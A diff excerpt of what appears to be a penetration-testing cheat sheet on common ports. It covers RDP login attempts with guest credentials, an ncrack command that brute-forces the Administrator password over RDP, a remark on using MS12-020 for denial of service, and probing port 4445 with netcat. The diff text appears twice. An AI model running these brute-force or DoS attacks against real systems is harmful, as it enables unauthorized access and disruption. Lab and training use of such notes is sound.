Loading list_of_common_ports.md +4 −1 Original line number Diff line number Diff line Loading @@ -704,11 +704,14 @@ rdesktop -u guest -p guest 10.11.1.5 -g 94% ``` Brute force like this ``` ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101 ``` ### Ms12-020 This is categorized by microsoft as a RCE vulnerability. But there is no POC for it online. You can only DOS a machine using this exploit. ## Port 4445 - Upnotifyp I have not found anything here. Try connecting with netcat and visiting in browser. Loading Loading
list_of_common_ports.md +4 −1 Original line number Diff line number Diff line Loading @@ -704,11 +704,14 @@ rdesktop -u guest -p guest 10.11.1.5 -g 94% ``` Brute force like this ``` ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101 ``` ### Ms12-020 This is categorized by microsoft as a RCE vulnerability. But there is no POC for it online. You can only DOS a machine using this exploit. ## Port 4445 - Upnotifyp I have not found anything here. Try connecting with netcat and visiting in browser. Loading